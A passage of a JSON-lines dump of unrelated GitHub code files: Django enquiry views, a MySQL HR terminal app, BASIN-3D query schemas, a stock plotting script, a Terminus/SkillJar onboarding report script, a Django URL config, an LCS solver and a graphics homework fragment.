request.user.is_superuser:\n messages.error(request, 'Sorry, only store owner can edit enquiries.')\n return redirect(reverse('home'))\n\n enquiry = get_object_or_404(Enquiry, pk=enquiry_id)\n\n if request.method == 'POST':\n form = EnquiryForm(request.POST, instance=enquiry)\n\n if form.is_valid():\n form.save()\n messages.success(request, \"Enquiry was edited successfully.\")\n return redirect(reverse('enquiries'))\n else:\n messages.error(request,\n 'Enquiry was not edited. Correct the form inputs.'\n )\n else:\n form = EnquiryForm(instance=enquiry)\n\n template = 'enquiry/edit_enquiry.html'\n context = {\n 'form': form,\n 'enquiry': enquiry,\n 'on_page': True,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_enquiry(request, enquiry_id):\n \"\"\" Delete an enquiry \"\"\"\n if not request.user.is_superuser:\n messages.error(\n request,\n 'Sorry, only the admin can delete enquiries.')\n return redirect(reverse('enquiries'))\n\n enquiry = get_object_or_404(Enquiry, pk=enquiry_id)\n enquiry.delete()\n messages.success(request,\n 'Enquiry was deleted successfully.')\n\n context = {\n 'on_page': True,\n }\n\n return redirect(reverse('enquiries'), context)\n","repo_name":"lucia2007/bookwormkid","sub_path":"enquiry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22546442845","text":"# Import MySql Connector\r\nimport mysql.connector\r\n\r\n# TO CONNECTOR OBJECT\r\nmycon = mysql.connector.connect(\r\nhost='localhost', user='root',\r\npassword='', database='HR')\r\n# TO CURSOR OBJECT MAS\r\ncurs = mycon.cursor()\r\n\r\n\r\n# FUNCTION GIA ELEGXO ID AN YPARXEI STH VASH\r\ndef check():\r\n # SELECT QUERY GIA ELEGXO ID\r\n qry = 'select id_emp from personel;'\r\n curs.execute(qry)\r\n\r\n d = curs.fetchall()\r\n idlist = []\r\n for ids in d:\r\n idlist.append(ids[0])\r\n return idlist\r\n\r\n# FUNCTION GIA PROS8HKH YPALLHLOY STHN VASH MAS\r\ndef register():\r\n loop = 'Y'\r\n idlist = check()\r\n while loop in 'yY':\r\n id_emp = int(input('Enter employee ID: '))\r\n # ELEGXOS AN YPARXEI TO ID HDH STHN VASH MAS\r\n if id_emp in idlist:\r\n print(\"This Employee Id already exists. Try another!\\n\")\r\n\r\n else:\r\n # DHMIOYRGOYME TUPPLE ME TA STOIXEIA POY 8ELOYME NA DWSOYME STON YPALLHLO\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (id_emp, name, email, phone, address, salary)\r\n\r\n qry = 'insert into personel values(%s,%s,%s,%s,%s,%s);'\r\n\r\n val = data\r\n\r\n curs.execute(qry, val)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY REGISTERED!!\\n')\r\n loop = input('Do you want to register another employee? (Y/N) ')\r\n if loop not in ('Yy'):\r\n break\r\n\r\n\r\n\r\n# FUNCTION GIA PROVOLH STOIXEIWN ENOS YPALLHLOY\r\ndef view():\r\n id_emp = int(input('Enter the ID of the employee you wish to view: '))\r\n\r\n #TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n\r\n #ELEGXOS AN YPARXEI TO ID POY DINEI O XRHSTHS\r\n idlist = check()\r\n if id_emp in idlist:\r\n # TO QUERY POY XREIAZOMASTE GIA NA MAS EMFANISEI OLA TA STOIXEIA TOY YPALLHLOY\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n\r\n\r\n#FUNCTION POY EPEKSERGAZETAI DEDOMENA XRHSTWN\r\ndef edit():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n\r\n # ELEGXOS AN YPARXEI TO ID POY DINEI O XRHSTHS\r\n idlist = check()\r\n\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = input('Are you sure you want to edit this data? (Y/N) ')\r\n if con in ('y', 'Y'):\r\n\r\n #TUPPLE data TO GEMIZOYME ME DEDOMENA POY DINEI O XRHSTHS\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (name, email, phone, address, salary, id_emp)\r\n\r\n # UPDATE QUERY GIA NA GINEI TO EDIT STHN VASH\r\n qry = \"update personel \" \\\r\n \"set name=%s, email=%s, phone=%s, address=%s, salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY EDITED!!\\n')\r\n else:\r\n print('EDIT CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n# FUNCTION PROAGWGHS\r\ndef promote():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected for promotion is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = input('Are you sure you want to promote this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = ()\r\n salary = input('Salary : ')\r\n data = (salary, id_emp)\r\n\r\n #UPDATE QUERY GIA EDIT MIS8OY\r\n qry = \"update personel \" \\\r\n \"set salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY PROMOTED!!\\n')\r\n else:\r\n print('PROMOTION CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n# FUNCTION GIA DIAGRAFH YPALLHLOY APO THN VASH\r\ndef delete():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = input('Are you sure you want to DELETE this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = (id_emp,)\r\n\r\n\r\n #TO DELETE QUERY POY 8A DIAGRAPSEI TON XRHSTH\r\n qry = \"delete from personel \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY DELETED!!\\n')\r\n else:\r\n print('DELETE CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n#FUNCTION GIA ANAZHTHSH SYGKEKRIMENOY XRHSTH\r\ndef search():\r\n id_emp = int(input('Enter employee ID: '))\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n #EDW ANOIGOYME ENA MENU PAROMOIO ME THN ARXIKH MAS SELIDA GIA NA EPEKSERGASTOYME TON EPILEGMENO YPALLHLO\r\n #OI EPILOGES KANOYN SXEDON TIS IDIES DIADIKASIES ME TA FUNCTIONS APO PANW.\r\n print('What would you like to do with this employee?\\n'\r\n 'a. Edit Employee\\n'\r\n 'b. Promote Employee\\n'\r\n 'c. Delete Employee\\n'\r\n 'd. Search Another Employee\\n'\r\n 'e. Back to homepage!\\n')\r\n ch=input('Choose an action: ')\r\n if ch in ('a','A'):\r\n con = input('Are you sure you want to edit this employee? (Y/N) ')\r\n if con in ('y', 'Y'):\r\n # TUPPLE data TO GEMIZOYME ME DEDOMENA POY DINEI O XRHSTHS\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (name, email, phone, address, salary, id_emp)\r\n\r\n qry = \"update personel \" \\\r\n \"set name=%s, email=%s, phone=%s, address=%s, salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY EDITED!!\\n')\r\n else:\r\n print('EDIT CANCELED!!\\n')\r\n elif ch in ('b','B'):\r\n con = input('Are you sure you want to promote this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = ()\r\n salary = input('Salary : ')\r\n data = (salary, id_emp)\r\n\r\n qry = \"update personel \" \\\r\n \"set salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY PROMOTED!!\\n')\r\n else:\r\n print('PROMOTION CANCELED!!\\n')\r\n elif ch in ('c','C'):\r\n con = input('Are you sure you want to DELETE this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = (id_emp,)\r\n\r\n qry = \"delete from personel \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY DELETED!!\\n')\r\n else:\r\n print('DELETE CANCELED!!\\n')\r\n elif ch in ('d','D'):\r\n search()\r\n elif ch in ('e','E'):\r\n print('RETURNING TO HOMEPAGE!\\n')\r\n else:\r\n print('WRONG INPUT. BACK TO HOMEPAGE.\\n')\r\n\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n#ARXIKH SELIDA TOY PROGRAMMATOS\r\nch=0\r\nprint('**WELCOME TO OUR HR MANAGEMENT TERMINAL**\\n')\r\n\r\n#LOOP GIA NA MHN XREIAZETAI O XRHSTHS NA TREXEI TO PROGRAMMA APO THN ARXH KA8E FORA POY EKTELEI MIA PRAKSH EPITYXWS\r\nwhile ch !=7:\r\n print('***** HOME-PAGE *****\\n')\r\n print('You can use this terminal to do the following actions:\\n\\n'\r\n '1. Register New Employee\\n'\r\n '2. View Employee Data\\n'\r\n '3. Edit Employee Data\\n'\r\n '4. Promote Employee\\n'\r\n '5. Delete Employee\\n'\r\n '6. Search Employee\\n'\r\n '7. EXIT\\n')\r\n ch=int(input('Please type the number of the desired action: \\n'))\r\n\r\n if ch == 1 :\r\n register()\r\n elif ch == 2 :\r\n view()\r\n\r\n elif ch == 3 :\r\n edit()\r\n\r\n elif ch == 4 :\r\n promote()\r\n\r\n elif ch == 5 :\r\n delete()\r\n\r\n elif ch == 6 :\r\n search()\r\n elif ch == 7 :\r\n print('EXITING...')\r\n else:\r\n print('WRONG INPUT. TRY AGAIN!\\n\\n')","repo_name":"vmilon/hr_app","sub_path":"vasileios_mylonas.py","file_name":"vasileios_mylonas.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7236057493","text":"\"\"\"\n\n.. currentmodule:: basin3d.core.schema.query\n\n:platform: Unix, Mac\n:synopsis: BASIN-3D Query Schema\n:module author: Val Hendrix \n:module author: Danielle Svehla Christianson \n\n.. contents:: Contents\n :local:\n :backlinks: top\n\n\n\"\"\"\nfrom datetime import date\nfrom typing import ClassVar, List, Optional, Union\n\nfrom pydantic import BaseModel, Field\n\nfrom basin3d.core.schema.enum import FeatureTypeEnum, MessageLevelEnum, ResultQualityEnum, SamplingMediumEnum, StatisticEnum, AggregationDurationEnum\n\n\ndef _to_camelcase(string) -> str:\n \"\"\"\n Change provided string with underscores to Javascript camelcase\n (e.g. to_camelcase -> toCamelcase)\n :param string: The string to transform\n :return:\n \"\"\"\n return \"\".join(i and s[0].upper() + s[1:] or s for i, s in enumerate(string.split(\"_\")))\n\n\nclass QueryBase(BaseModel):\n \"\"\" Query Base Class. This sets `QueryBase.Config` defaults and processes incoming datasource ids\"\"\"\n\n datasource: Optional[List[str]] = Field(title=\"Datasource Identifiers\",\n description=\"List of datasource identifiers to query by.\")\n\n id: Optional[str] = Field(title=\"Identifier\", description=\"The unique identifier for the desired object\")\n\n is_valid_translated_query: Union[None, bool] = Field(default=None, title=\"Valid translated query\",\n description=\"Indicates whether the translated query is valid: None = is not translated\")\n\n def __init__(self, **data):\n \"\"\"\n Custom constructor to modify datasource string to list, if necessary\n\n :param data: the data\n \"\"\"\n if \"datasource\" in data and data['datasource']:\n data['datasource'] = isinstance(data['datasource'], str) and list([data['datasource']]) or data[\n 'datasource']\n super().__init__(**data)\n\n class Config:\n # output fields to camelcase\n alias_generator = _to_camelcase\n # whether an aliased field may be populated by its name as given by the model attribute\n # (allows bot camelcase and underscore fields)\n allow_population_by_field_name = True\n # Instead of using enum class use enum value (string object)\n use_enum_values = True\n # Validate all fields when initialized\n validate_all = True\n\n # Get the query fields that have mappings. Subclasses may overwrite this base function\n mapped_fields: ClassVar[List[str]] = []\n\n # Get the query fields that have prefixes. Subclasses may overwrite ths base function\n prefixed_fields: ClassVar[List[str]] = []\n\n\nclass QueryMonitoringFeature(QueryBase):\n \"\"\"Query :class:`basin3d.core.models.MonitoringFeature`\"\"\"\n # optional but id (QueryBase) is required to query by named monitoring feature\n feature_type: Optional[FeatureTypeEnum] = Field(title=\"Feature Type\",\n description=\"Filter results by the specified feature type.\")\n monitoring_feature: Optional[List[str]] = Field(title=\"Monitoring Features\",\n description=\"Filter by the list of monitoring feature identifiers\")\n parent_feature: Optional[List[str]] = Field(title=\"Parent Monitoring Features\",\n description=\"Filter by the list of parent monitoring feature identifiers\")\n\n def __init__(self, **data):\n \"\"\"\n Custom constructor to modify feature_type strings to uppercase\n\n :param data: the data\n \"\"\"\n\n # convert strings to lists for some fields; the camel case is for Pydantic validation\n for field in [\"monitoring_feature\", \"monitoringFeature\", \"parent_feature\", \"parentFeature\"]:\n if field in data and data[field] and isinstance(data[field], str):\n data[field] = list([data[field]])\n\n # To upper for feature type\n for field in [\"featureType\", \"feature_type\"]:\n if field in data and data[field]:\n data[field] = isinstance(data[field], str) and data[field].upper() or data[field]\n super().__init__(**data)\n\n prefixed_fields: ClassVar[List[str]] = ['id', 'monitoring_feature', 'parent_feature']\n\n\nclass QueryMeasurementTimeseriesTVP(QueryBase):\n \"\"\"Query :class:`basin3d.core.models.MeasurementTimeseriesTVP`\"\"\"\n # required\n monitoring_feature: List[str] = Field(min_items=1, title=\"Monitoring Features\",\n description=\"Filter by the list of monitoring feature identifiers\")\n observed_property: List[str] = Field(min_items=1, title=\"Observed Property Variables\",\n description=\"Filter by the list of observed property variables\")\n start_date: date = Field(title=\"Start Date\", description=\"Filter by data taken on or after the start date\")\n\n # optional\n aggregation_duration: AggregationDurationEnum = Field(default='DAY', title=\"Aggregation Duration\",\n description=\"Filter by the specified aggregation duration or time frequency\")\n end_date: Optional[date] = Field(title=\"End Date\", description=\"Filter by data taken on or before the end date\")\n statistic: Optional[List[StatisticEnum]] = Field(title=\"Statistic\",\n description=\"Return specified statistics, if they exist.\")\n result_quality: Optional[List[ResultQualityEnum]] = Field(title=\"Result Quality\",\n description=\"Filter by specified result qualities\")\n sampling_medium: Optional[List[SamplingMediumEnum]] = Field(title=\"Sampling Medium\",\n description=\"Filter results by specified sampling medium\")\n\n def __init__(self, **data):\n \"\"\"\n Custom constructor\n\n :param data: the data\n \"\"\"\n\n # convert strings to lists for some fields; the camel case are for Pydantic validation (don't delete)\n for field in [\"monitoring_feature\", \"monitoringFeature\", \"observed_property\", \"observedProperty\",\n \"statistic\", \"result_quality\", \"sampling_medium\"]:\n if field in data and data[field] and isinstance(data[field], str):\n data[field] = list([data[field]])\n\n data = self.__validate__(**data)\n\n super().__init__(**data)\n\n @staticmethod\n def __validate__(**data):\n \"\"\"\n Valiate\n :return:\n \"\"\"\n if 'aggregation_duration' in data and data['aggregation_duration'] is None:\n del data['aggregation_duration']\n return data\n\n # observed_property_variables is first b/c it is most likely to have compound mappings.\n # ToDo: check how order may affect translation (see core/synthesis)\n mapped_fields: ClassVar[List[str]] = ['observed_property', 'aggregation_duration', 'statistic', 'result_quality', 'sampling_medium']\n prefixed_fields: ClassVar[List[str]] = ['monitoring_feature']\n\n\nclass SynthesisMessage(BaseModel):\n \"\"\"BASIN-3D Synthesis Message \"\"\"\n\n msg: str = Field(title=\"Msg\", description=\"The synthesis message \")\n level: MessageLevelEnum = Field(title=\"Level\", description=\"The severity level of the message.\")\n where: Optional[List[str]] = Field([], title=\"Where\",\n description=\"The place in BASIN-3D where the synthesis message was generated \"\n \"from. \"\n \"If empty or null, this is a BASIN-3D error, the first item in \"\n \"the list is the datsource id, \"\n \"the second should be the synthesis model.\")\n\n class Config:\n # output fields to camelcase\n alias_generator = _to_camelcase\n # whether an aliased field may be populated by its name as given by the model attribute\n # (allows bot camelcase and underscore fields)\n allow_population_by_field_name = True\n # Instead of using enum class use enum value (string object)\n use_enum_values = True\n # Validate all fields when initialized\n validate_all = True\n\n\nclass SynthesisResponse(BaseModel):\n \"\"\"BASIN-3D Synthesis Response \"\"\"\n\n query: QueryBase = Field(title=\"Query\", description=\"The original query for the current response\")\n data: Optional[Union[object, List[object]]] = Field(title=\"Data\",\n description=\"The data for the current response. Empty if provided \"\n \"via Iterator.\")\n messages: List[Optional[SynthesisMessage]] = Field([], title=\"Messages\",\n description=\"The synthesis messages for this response\")\n\n class Config:\n # output fields to camelcase\n alias_generator = _to_camelcase\n # whether an aliased field may be populated by its name as given by the model attribute\n # (allows bot camelcase and underscore fields)\n allow_population_by_field_name = True\n # Instead of using enum class use enum value (string object)\n use_enum_values = True\n # Validate all fields when initialized\n validate_all = True\n # Allows generic object to be used for data field\n arbitrary_types_allowed = True\n","repo_name":"BASIN-3D/basin3d","sub_path":"basin3d/core/schema/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"26644388744","text":"import urllib.request, json \nimport matplotlib.pyplot as plt\nimport numpy as np\nxpoints=[]\nypoints=[]\nwith urllib.request.urlopen(\"http://54.188.231.51:5000/Stock_Price_Time_Series_Weekly/?ticker=ABB.BSE&start_date=2020-10-01&end_date=2022-10-01\") as url:\n data = json.load(url)\n #print(data)\n #print(data[0]['adjustedclose'])\n for i in data:\n xpoints.append(i['tradedate']) \n ypoints.append(i['adjustedclose']) \nxpts=xpoints[::-1]\nypts=ypoints[::-1]\nplt.plot(xpts, ypts)\nplt.title(\"WEEKLY TIME SERIES\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Closing Price\")\nplt.tick_params(axis='x', which='major', labelsize=0.01)\nplt.show()\n\n","repo_name":"JuhiKrishnamurthy/Stock_Screener","sub_path":"BACKEND/urljsontry.py","file_name":"urljsontry.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35120820760","text":"import sys\nimport os\nimport subprocess\nimport datetime\nimport dateutil.parser\nimport json\nimport re\nimport urllib.parse\nimport time\n\nimport mechanize\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\nfrom http.cookiejar import LWPCookieJar\nimport requests\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\n## .env variables\nterminus_email = os.getenv('TR_EMAIL')\nskilljar_pass = os.getenv('SJ_PASWD')\nskilljar_email = os.getenv('SJ_EMAIL')\nexcluded_uuids = os.getenv('UUIDS').splitlines()\n\n###\n# Terminus Authentication\n###\n\n## Check validity of an email address\ndef is_valid_email(email):\n # Regular expression pattern for a valid email address\n pattern = r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\"\n return re.match(pattern, email) is not None\n\n## Terminus authority verify\ncheck_user = subprocess.Popen(\"terminus whoami\", shell=True, stdout=subprocess.PIPE)\ncheck_user_return = check_user.stdout.read()\n\n## Terminus Auth:Login if not logged in\nif is_valid_email(check_user_return.decode()):\n login = subprocess.Popen(\"terminus auth:login --email=\"+terminus_email, shell=True, stdout=subprocess.PIPE)\n login_result= login.stdout.read()\n\n###\n# Set SkillJar session for scraping\n###\n\n## Create Session\ns = requests.Session()\ncookie_file = '/tmp/cookies'\njar = LWPCookieJar(cookie_file)\n\nbrowser = mechanize.Browser()\nbrowser.set_handle_robots(False)\nbrowser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]\nbrowser.set_cookiejar(jar)\n\nbrowser.open(\"https://dashboard.skilljar.com/login\")\n\nbrowser.select_form(nr=0)\nbrowser.form['email'] = skilljar_email\nbrowser.form['password1'] = skilljar_pass\nbrowser.submit()\n\n\n###\n# Terminus Loop\n###\n\n## Create an array organizations where member\nget_orgs = subprocess.Popen(\"terminus org:list --fields=ID,Name,Label --format=csv\", shell=True, stdout=subprocess.PIPE)\nget_orgs_return = get_orgs.stdout.read()\n\n## Iterate through organization array\nfor org_line in get_orgs_return.splitlines():\n org = org_line.decode(\"utf-8\").split(',')\n\n # check if organization is exluded\n if (org[0] not in excluded_uuids):\n if (org[1] != \"Name\"):\n \n # Assign ID, Name, Label\n orgID = org[0]\n orgName = org[1]\n orgLabel = org[2]\n\n # Markup formatting\n print('Weekly Review for *'+orgLabel.strip('\\\"')+'* \\n')\n print('*LMS*')\n\n lms_count = 0\n # Users within Org\n get_users = subprocess.Popen(\"terminus org:people:list \"+ orgID + \" --field=Email --format=csv\", shell=True, stdout=subprocess.PIPE)\n get_users_return = get_users.stdout.read()\n for org_user in get_users_return.splitlines():\n user = org_user.decode(\"utf-8\")\n domain = user.split('@')[1] \n\n ## Exclude members who are Pantheors\n if not (\"pantheon\") in domain:\n # print(user)\n browser.open(\"https://dashboard.skilljar.com/analytics/students/ajax-data?draw=1&start=0&length=25&skip_total_count=true&order[0][column]=5&order[0][dir]=desc&signed_up_at=all&latest_activity=all&search[value]=\"+urllib.parse.quote_plus(user)+\"&_=1668790286383\")\n response = browser.response().read().decode('utf-8')\n r = json.loads(response)\n\n for mem in r['data']:\n if (mem['registrations']['display'] > 0):\n print(user)\n lms = user+\"\\n\"\n latest_activity = re.sub('<[^<]+?>', '', mem['latest_activity']['display'])\n print(\"* Registrations: \"+str(mem['registrations']['display']))\n print(\"* Course Completions: \"+str(mem['course_completions']['display']))\n print(\"* Latest Activity: \"+latest_activity)\n lms_count = lms_count + 1\n time.sleep(3)\n\n if (lms_count < 1):\n print(\"No org members registered in LMS\")\n\n # Site Loop within Org\n get_sites = subprocess.Popen(\"terminus org:site:list \"+ orgID + \" --fields=ID,Name,\\\"Is Frozen?\\\" --format=csv\", shell=True, stdout=subprocess.PIPE)\n get_sites_return = get_sites.stdout.read()\n \n site_count = len(get_sites_return.splitlines()) - 1\n \n if (site_count == 0):\n print(\"No Sites\")\n else:\n print(str(site_count)+\" Sites in org\")\n\n for site_line in get_sites_return.splitlines():\n site = site_line.decode(\"utf-8\").split(',')\n if (site[1] != \"Name\"):\n \n # Assign ID, Name, Frozen\n siteID = site[0]\n siteName = site[1]\n frozen = site[2]\n\n # If NOT Frozen\n if (frozen == \"false\"):\n\n # Env loop envs within site\n get_envs = subprocess.Popen(\"terminus env:info \"+ siteName+\".live\" + \" --field=Initialized\", shell=True, stdout=subprocess.PIPE)\n get_envs_return = get_envs.stdout.read()\n\n # Find Live env\n if b'1\\n' in get_envs_return:\n print(f\"Live Environment: {site[1]}\")\n\n print(\"=======================\")\n\n","repo_name":"ericmichalsen/onboarding_app","sub_path":"weekly_check.py","file_name":"weekly_check.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"922108328","text":"from django.urls import path\n\nfrom apps.back_office.views import interview\nfrom apps.back_office.views.news import NewsListAPIView, NewsDestroyAPIView, NewsCreateAPIView, NewsUpdateAPIView, \\\n NewsRetrieveAPIView\nfrom apps.back_office.views.photo_report import PhotoReportCreateAPIView, PhotoReportDetailAPIView, \\\n PhotoReportUpdateAPIView, PhotoReportDestroyAPIView\nfrom apps.back_office.views.podcast import PodcastDestroyAPIView, PodcastRetrieveAPIView, PodcastUpdateAPIView, \\\n PodcastCreateAPIView, PodcastListAPIView\n\nfrom apps.back_office.views.tag import (\n TagCreateAPIView,\n TagDestroyAPIView,\n TagUpdateAPIView,\n)\nfrom apps.back_office.views.profile import (\n UserProfileAPIView,\n ProfileUpdateView,\n UserUpdateView,\n ProfileListView,\n ProfileDestroyAPIView,\n)\nfrom apps.photoreport.views import PhotoReportListAPIView\n\nurlpatterns = [\n # interview Urls\n path(\"interview/list/\", interview.InterviewListAPIView.as_view(), name=\"back_interview_list\"),\n path(\"interview/create/\", interview.InterviewCreateAPIView.as_view(), name=\"back_interview_create\"),\n path(\"interview/update//\", interview.InterviewUpdateAPIView.as_view(), name=\"back_interview_update\"),\n path(\"interview/delete//\", interview.InterviewDestroyAPIView.as_view(), name=\"back_interview_delete\"),\n path(\"interview/detail//\", interview.InterviewRetrieveAPIView.as_view(), name=\"back_interview_detail\"),\n\n # tag Urls\n path(\"tag/create/\", TagCreateAPIView.as_view(), name=\"back_tag_create\"),\n path(\"tag/update//\", TagUpdateAPIView.as_view(), name=\"back_tag_update\"),\n path(\"tag/delete//\", TagDestroyAPIView.as_view(), name=\"back_tag_delete\"),\n\n # user Url\n path(\"user/edit//\", UserUpdateView.as_view(), name=\"back_user_edit\"),\n\n # profile Urls\n path(\"profile/list/\", ProfileListView.as_view(), name=\"back_profile_list\"),\n path(\"profile/detail/\", UserProfileAPIView.as_view(), name=\"back_profile_detail\"),\n path(\"profile/edit//\", ProfileUpdateView.as_view(), name=\"back_profile_update\"),\n path(\"profile/delete/\", ProfileDestroyAPIView.as_view(), name=\"back_profile_delete\"),\n\n # news Urls\n path(\"news/list/\", NewsListAPIView.as_view(), name=\"back_news_list\"),\n path(\"news/create/\", NewsCreateAPIView.as_view(), name=\"back_news_create \"),\n path(\"news/update//\", NewsUpdateAPIView.as_view(), name=\"back_news_update\"),\n path(\"news/delete//\", NewsDestroyAPIView.as_view(), name=\"back_news_delete\"),\n path(\"news/detail//\", NewsRetrieveAPIView.as_view(), name=\"back_news_detail\"),\n\n # photo report Urls\n path(\"photo-report/list/\", PhotoReportListAPIView.as_view(), name=\"back_photo_report_list\"),\n path(\"photo-report/create/\", PhotoReportCreateAPIView.as_view(), name=\"back_photo_report_create \"),\n path(\"photo-report/update//\", PhotoReportUpdateAPIView.as_view(), name=\"back_photo_report_update\"),\n path(\"photo-report/detail//\", PhotoReportDetailAPIView.as_view(), name=\"back_photo_report_detail\"),\n path(\"photo-report/delete//\", PhotoReportDestroyAPIView.as_view(), name=\"back_photo_report_delete\"),\n\n # podcast Urls\n path(\"podcast/list/\", PodcastListAPIView.as_view(), name=\"back_podcast_list\"),\n path(\"podcast/create/\", PodcastCreateAPIView.as_view(), name=\"back_podcast_create \"),\n path(\"podcast/update//\", PodcastUpdateAPIView.as_view(), name=\"back_podcast_update\"),\n path(\"podcast/detail//\", PodcastRetrieveAPIView.as_view(), name=\"back_podcast_detail\"),\n path(\"podcast/delete//\", PodcastDestroyAPIView.as_view(), name=\"back_podcast_delete\"),\n]\n","repo_name":"Ilyosbek07/UzNews","sub_path":"apps/back_office/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14579208914","text":"\nclass Solution:\n def solve(self, str1, str2):\n\n from functools import lru_cache\n @lru_cache(None)\n def dp(m, n):\n res = set()\n if m == 0 or n == 0:\n return res\n if str1[m-1] == str2[n-1]:\n data = dp(m-1,n-1)\n if data:\n for i in data:\n res.add(i + str1[m-1])\n else:\n res.add(str1[m-1])\n else:\n max_m = max((len(i) for i in dp(m-1, n)), default=0)\n max_n = max((len(i) for i in dp(m, n-1)), default=0)\n if max_m >= max_n:\n res = dp(m-1, n)\n if max_n >= max_m:\n tmp = dp(m, n-1)\n res.update(tmp)\n return res\n \n return dp(len(str1), len(str2))\n\nprint(Solution().solve(\"AGTGATG\", \"GTTAG\"))\nprint(Solution().solve(\"AATCC\", \"ACACG\"))\nprint(Solution().solve(\"ABCBDAB\", \"BDCABA\"))\n","repo_name":"duyquang6/ds-algo-pratice","sub_path":"dp/print_longest_common_subseq.py","file_name":"print_longest_common_subseq.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30219503756","text":"#hw6.py\n#Student Health Record System\n#Derek Yang\n#63118832\n\n\nimport math\nfrom graphics import *\n\n\ndef checkClickPosition(click):\n# TODO: click is the Point from the user mouse click\n# The function should return the button number selected\n x=click.getX()\n y=click.getY()\n if x>=44 and x<=56 and y<=37 and y>=33:\n op=1\n return op\n 